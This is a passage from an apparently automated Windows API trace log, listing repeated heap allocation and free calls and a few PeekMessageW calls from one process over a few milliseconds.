hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fda70 | out: hHeap=0x2c0000) returned 1 [0173.932] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2fda70 [0173.932] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8d2f0 [0173.932] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.932] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fda70 | out: hHeap=0x2c0000) returned 1 [0173.932] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2fda70 [0173.932] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8d2f0 [0173.932] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.932] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fda70 | out: hHeap=0x2c0000) returned 1 [0173.932] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2fda70 [0173.932] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8d2f0 [0173.932] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.932] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fda70 | out: hHeap=0x2c0000) returned 1 [0173.932] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2fda70 [0173.932] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3a8d2f0 [0173.932] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.932] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fda70 | out: hHeap=0x2c0000) returned 1 [0173.932] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2fda70 [0173.932] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8d2f0 [0173.932] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x326560 [0173.932] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.932] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x326560 | out: hHeap=0x2c0000) returned 1 [0173.932] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fda70 | out: hHeap=0x2c0000) returned 1 [0173.932] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2fda70 [0173.932] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8d2f0 [0173.932] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.933] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fda70 | out: hHeap=0x2c0000) returned 1 [0173.933] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2fda70 [0173.933] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3a8d2f0 [0173.933] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.933] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fda70 | out: hHeap=0x2c0000) returned 1 [0173.933] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2fda70 [0173.933] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3aa2818 [0173.933] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa2818 | out: hHeap=0x2c0000) returned 1 [0173.933] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fda70 | out: hHeap=0x2c0000) returned 1 [0173.933] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2fda70 [0173.933] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3aa2818 [0173.933] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa2818 | out: hHeap=0x2c0000) returned 1 [0173.933] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fda70 | out: hHeap=0x2c0000) returned 1 [0173.933] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2fda70 [0173.933] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8d2f0 [0173.933] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.933] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fda70 | out: hHeap=0x2c0000) returned 1 [0173.933] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2fda70 [0173.933] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8d2f0 [0173.933] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.933] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fda70 | out: hHeap=0x2c0000) returned 1 [0173.933] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2fda70 [0173.933] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3a8d2f0 [0173.933] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.933] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fda70 | out: hHeap=0x2c0000) returned 1 [0173.933] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2fda70 [0173.933] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3a8d2f0 [0173.933] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.933] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fda70 | out: hHeap=0x2c0000) returned 1 [0173.933] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2fda70 [0173.933] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8d2f0 [0173.933] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.933] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fda70 | out: hHeap=0x2c0000) returned 1 [0173.933] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2fda70 [0173.933] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8d2f0 [0173.933] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.933] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fda70 | out: hHeap=0x2c0000) returned 1 [0173.933] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3237b8 | out: hHeap=0x2c0000) returned 1 [0173.933] PeekMessageW (in: lpMsg=0xa13ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xa13ff08) returned 0 [0173.933] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59dd0 [0173.934] PeekMessageW (in: lpMsg=0xa13fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xa13fb74) returned 0 [0173.934] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a028 [0173.934] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8d2f0 [0173.934] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.934] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a028 | out: hHeap=0x2c0000) returned 1 [0173.934] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a028 [0173.934] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8d2f0 [0173.934] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.934] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a028 | out: hHeap=0x2c0000) returned 1 [0173.934] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a028 [0173.934] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8d2f0 [0173.934] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.934] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a028 | out: hHeap=0x2c0000) returned 1 [0173.934] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a028 [0173.934] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8d2f0 [0173.934] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.934] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a028 | out: hHeap=0x2c0000) returned 1 [0173.934] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a028 [0173.934] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8d2f0 [0173.934] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.934] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a028 | out: hHeap=0x2c0000) returned 1 [0173.934] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a028 [0173.934] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3a8d2f0 [0173.934] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.934] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a028 | out: hHeap=0x2c0000) returned 1 [0173.934] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a028 [0173.934] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8d2f0 [0173.934] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x326560 [0173.934] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.934] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x326560 | out: hHeap=0x2c0000) returned 1 [0173.934] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a028 | out: hHeap=0x2c0000) returned 1 [0173.934] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a028 [0173.934] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8d2f0 [0173.934] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.934] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a028 | out: hHeap=0x2c0000) returned 1 [0173.934] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a028 [0173.934] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3a8d2f0 [0173.934] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.934] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a028 | out: hHeap=0x2c0000) returned 1 [0173.935] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a028 [0173.935] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3aa2818 [0173.935] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa2818 | out: hHeap=0x2c0000) returned 1 [0173.935] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a028 | out: hHeap=0x2c0000) returned 1 [0173.935] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a028 [0173.935] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3aa2818 [0173.935] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa2818 | out: hHeap=0x2c0000) returned 1 [0173.935] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a028 | out: hHeap=0x2c0000) returned 1 [0173.935] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a028 [0173.935] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8d2f0 [0173.935] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.935] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a028 | out: hHeap=0x2c0000) returned 1 [0173.935] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a028 [0173.935] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8d2f0 [0173.935] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.935] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a028 | out: hHeap=0x2c0000) returned 1 [0173.935] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a028 [0173.935] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3a8d2f0 [0173.935] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.935] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a028 | out: hHeap=0x2c0000) returned 1 [0173.935] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a028 [0173.935] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3a8d2f0 [0173.935] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.935] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a028 | out: hHeap=0x2c0000) returned 1 [0173.935] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a028 [0173.935] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8d2f0 [0173.935] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.935] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a028 | out: hHeap=0x2c0000) returned 1 [0173.935] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a028 [0173.935] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8d2f0 [0173.935] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.935] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a028 | out: hHeap=0x2c0000) returned 1 [0173.935] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a028 [0173.935] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8d2f0 [0173.935] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.935] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a028 | out: hHeap=0x2c0000) returned 1 [0173.936] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a028 [0173.936] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8d2f0 [0173.936] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.936] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a028 | out: hHeap=0x2c0000) returned 1 [0173.936] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a028 [0173.936] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8d2f0 [0173.936] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.936] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a028 | out: hHeap=0x2c0000) returned 1 [0173.936] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a028 [0173.936] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8d2f0 [0173.936] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.936] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a028 | out: hHeap=0x2c0000) returned 1 [0173.936] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a028 [0173.936] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8d2f0 [0173.936] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.936] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a028 | out: hHeap=0x2c0000) returned 1 [0173.936] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a028 [0173.936] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8d2f0 [0173.936] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x326560 [0173.936] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.936] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x326560 | out: hHeap=0x2c0000) returned 1 [0173.936] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a028 | out: hHeap=0x2c0000) returned 1 [0173.936] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a028 [0173.936] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8d2f0 [0173.936] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.936] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a028 | out: hHeap=0x2c0000) returned 1 [0173.936] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a028 [0173.936] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8d2f0 [0173.936] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x326560 [0173.936] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.936] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x326560 | out: hHeap=0x2c0000) returned 1 [0173.936] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a028 | out: hHeap=0x2c0000) returned 1 [0173.936] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a028 [0173.936] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3aa2818 [0173.936] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa2818 | out: hHeap=0x2c0000) returned 1 [0173.936] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a028 | out: hHeap=0x2c0000) returned 1 [0173.936] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a028 [0173.937] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3aa2818 [0173.937] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa2818 | out: hHeap=0x2c0000) returned 1 [0173.937] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a028 | out: hHeap=0x2c0000) returned 1 [0173.937] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a028 [0173.937] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8d2f0 [0173.937] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.937] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a028 | out: hHeap=0x2c0000) returned 1 [0173.937] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a028 [0173.937] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8d2f0 [0173.937] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.937] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a028 | out: hHeap=0x2c0000) returned 1 [0173.937] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a028 [0173.937] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8d2f0 [0173.937] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x326560 [0173.937] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.937] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x326560 | out: hHeap=0x2c0000) returned 1 [0173.937] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a028 | out: hHeap=0x2c0000) returned 1 [0173.937] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a028 [0173.937] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3a8d2f0 [0173.937] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.937] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a028 | out: hHeap=0x2c0000) returned 1 [0173.937] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a028 [0173.937] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3a8d2f0 [0173.937] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.937] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a028 | out: hHeap=0x2c0000) returned 1 [0173.937] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a028 [0173.937] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8d2f0 [0173.937] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.937] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a028 | out: hHeap=0x2c0000) returned 1 [0173.937] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a028 [0173.937] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8d2f0 [0173.937] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.937] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a028 | out: hHeap=0x2c0000) returned 1 [0173.937] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a028 [0173.937] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8d2f0 [0173.937] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.937] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a028 | out: hHeap=0x2c0000) returned 1 [0173.937] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a028 [0173.937] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8d2f0 [0173.937] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.938] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a028 | out: hHeap=0x2c0000) returned 1 [0173.938] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a028 [0173.938] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8d2f0 [0173.938] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.938] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a028 | out: hHeap=0x2c0000) returned 1 [0173.938] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a028 [0173.938] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8d2f0 [0173.938] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.938] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a028 | out: hHeap=0x2c0000) returned 1 [0173.938] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a028 [0173.938] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8d2f0 [0173.938] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.938] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a028 | out: hHeap=0x2c0000) returned 1 [0173.938] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a028 [0173.938] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8d2f0 [0173.938] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x326560 [0173.938] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) 